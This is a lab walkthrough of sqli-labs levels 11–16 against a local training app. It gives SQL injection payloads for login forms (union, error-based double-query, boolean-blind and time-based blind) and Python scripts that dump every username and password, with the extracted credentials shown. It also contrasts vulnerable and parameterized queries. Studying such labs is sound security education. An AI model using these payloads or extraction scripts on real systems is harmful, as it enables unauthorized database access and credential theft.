LESS 11 String-based injection (POST)
Enter a single quote ' in the username field as a test; result:
You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '''' and password='' LIMIT 0,1' at line 1
Guess that the query is: select * from users where username = '$username' and password='$password' LIMIT 0,1
So construct the payload:
Username : 0' union select group_concat(username),group_concat(password) from users#
Password :
Result:
Your Login name:Dumb,Angelina,Dummy,secure,stupid,superman,batman,admin,admin1,admin2,admin3,dhakkan,admin4
Your Password:Dumb,I-kill-you,p@ssword,crappy,stupidity,genious,mob!le,admin,admin1,admin2,admin3,dumbo,admin4
LESS 12 Double-quote string-based injection (POST)
The difference from the previous level is that the string is wrapped in double quotes and parentheses, which the error message tells us.
The payload is as follows:
Username : 0") union select group_concat(username),group_concat(password) from users#
Password :
LESS 13 Double-query injection (POST)
The error message shows that the string is wrapped in a pair of single quotes and a pair of parentheses, but a successful login displays nothing; only error messages are shown, so use double-query (error-based) injection:
Username : 0') union select count(*), CONCAT_WS(CHAR(32,58,32),(select count(*) from users),floor(rand()*2)) as a from users group by a#
Password :
Result:
Duplicate entry '13 : 1' for key 'group_key'
A script can be written to dump the table:
from urllib import request
from urllib import parse
import re

url = "http://localhost/sqli-labs-master/Less-13/"
i = 0
while i < 13:
    # each request pulls one "username | password | rand" triple out of the duplicate-key error
    data = {"uname": "0') union select count(*), CONCAT_WS(CHAR(32,124,32),(select username from users limit " + str(i) + ",1),(select password from users limit " + str(i) + ",1),floor(rand()*2)) as a from users group by a#",
            "passwd": ""}
    response = request.urlopen(url, parse.urlencode(data).encode()).read().decode()
    info = re.search(r"[^']+\s\|\s[^\s]+?", response)
    if info is None:
        i -= 1  # rand() did not produce a duplicate key this time, so the same row is retried
    else:
        print(info.group())
    i += 1
结果:
Dumb | Dumb | 0
Angelina | I-kill-you | 1
Dummy | p@ssword | 0
secure | crappy | 1
stupid | stupidity | 1
superman | genious | 0
batman | mob!le | 1
admin | admin | 0
admin1 | admin1 | 0
admin2 | admin2 | 1
admin3 | admin3 | 1
dhakkan | dumbo | 1
admin4 | admin4 | 0
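As an added example (not part of this write-up or of the sqli-labs project), here is the query reconstructed in Less 11 built the vulnerable way, by string concatenation, next to the same lookup with bound parameters; the concatenated version also returns the driver's error text, which is exactly what the Less 13 duplicate-key trick reads. It uses an in-memory SQLite table in place of MariaDB, with the write-up's table and column names and a constructed subset of its rows.

```python
import sqlite3

# Constructed sample rows (a subset of the names the write-up dumps).
SAMPLE_USERS = [("Dumb", "Dumb"), ("Angelina", "I-kill-you"), ("admin", "admin")]


def make_db():
    """In-memory SQLite stand-in for the sqli-labs 'users' table."""
    con = sqlite3.connect(":memory:")
    con.execute("create table users (username text, password text)")
    con.executemany("insert into users values (?, ?)", SAMPLE_USERS)
    return con


def login_vulnerable(con, username, password):
    """The query guessed from the Less 11 error, built by concatenation.

    The submitted strings become part of the SQL text, so a quote closes the
    literal and whatever follows is parsed as SQL. The driver's error text is
    handed back to the caller, which is what Less 13 relies on.
    """
    sql = ("select username, password from users where username = '"
           + username + "' and password = '" + password + "' limit 0,1")
    try:
        return con.execute(sql).fetchone()
    except sqlite3.Error as exc:
        return ("error", str(exc))


def login_safe(con, username, password):
    """Same lookup with bound parameters: quotes and comment markers are data."""
    sql = ("select username, password from users "
           "where username = ? and password = ? limit 1")
    try:
        return con.execute(sql, (username, password)).fetchone()
    except sqlite3.Error:
        return None  # generic failure; no database message reaches the client
```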
LESS 14 Double-quote double-query injection (POST)
Apart from changing the single quote and parenthesis to a double quote, this is no different from the previous level; payload:
Username : 0" union select count(*), CONCAT_WS(CHAR(32,58,32),(select count(*) from users),floor(rand()*2)) as a from users group by a#
Password :
Everything else is the same as level 13.
LESS 15 Boolean-based blind injection (POST)
POST blind injection; take the script from level 7 and tweak it:
from urllib import request
from urllib import parse
import re

url = "http://localhost/sqli-labs-master/Less-15/"

def getLength(value):
    # the response contains "slap" when the injected condition is false
    length = 0
    while True:
        data = {"uname": "' or length(" + str(value) + ")=" + str(length) + "#", "passwd": ""}
        response = request.urlopen(url, parse.urlencode(data).encode()).read().decode()
        if re.search("slap", response):
            length += 1
        else:
            return length

def getName(value):
    dbname = ""
    for n in range(getLength(value)):
        a = 64
        b = 64
        # use bisection to build the dynamic parameter
        while True:
            b = int(b / 2)
            data = {"uname": "' or ascii(substr(" + value + "," + str(n + 1) + "))<" + str(a) + "#", "passwd": ""}
            response = request.urlopen(url, parse.urlencode(data).encode()).read().decode()
            if re.search("slap", response):
                data["uname"] = "' or ascii(substr(" + value + "," + str(n + 1) + "))=" + str(a) + "#"
                response = request.urlopen(url, parse.urlencode(data).encode()).read().decode()
                if re.search("slap", response):
                    a += b
                else:
                    dbname = dbname + chr(a)
                    break
            else:
                a -= b
    return dbname

print(getName("(select group_concat(username) from users)"))
print(getName("(select group_concat(password) from users)"))
Result is the same as level 8.
LESS 16 Time-based blind injection (POST)
Combine the level-9 script with a tweak of the previous level's script and you get this level's script:
from urllib import request
from urllib import parse
import time

url = "http://localhost/sqli-labs-master/Less-16/"

def getLength(value):
    # a response slower than the sleep() delay means the injected condition was true
    length = 0
    while True:
        data = {"uname": "' or if(length(" + value + ")=" + str(length) + ",sleep(0.1),1)#", "passwd": ""}
        t = time.time()
        request.urlopen(url, parse.urlencode(data).encode()).read().decode()
        if time.time() - t <= 0.1:
            length += 1
        else:
            return length

def getName(value):
    dbname = ""
    for n in range(getLength(value)):
        a = 64
        b = 64
        # use bisection to build the dynamic parameter
        while True:
            b = int(b / 2)
            data = {"uname": "' or if(ascii(substr(" + value + "," + str(n + 1) + "))<" + str(a) + ",sleep(0.1),1)#", "passwd": ""}
            t = time.time()
            request.urlopen(url, parse.urlencode(data).encode()).read().decode()
            if time.time() - t <= 0.1:
                data["uname"] = "' or if(ascii(substr(" + value + "," + str(n + 1) + "))=" + str(a) + ",sleep(0.1),1)#"
                t = time.time()
                request.urlopen(url, parse.urlencode(data).encode()).read().decode()
                if time.time() - t <= 0.1:
                    a += b
                else:
                    dbname = dbname + chr(a)
                    break
            else:
                a -= b
    return dbname

print(getName("(select group_concat(username) from users)"))
print(getName("(select group_concat(password) from users)"))
It is far too slow; I don't know of a good way to improve it.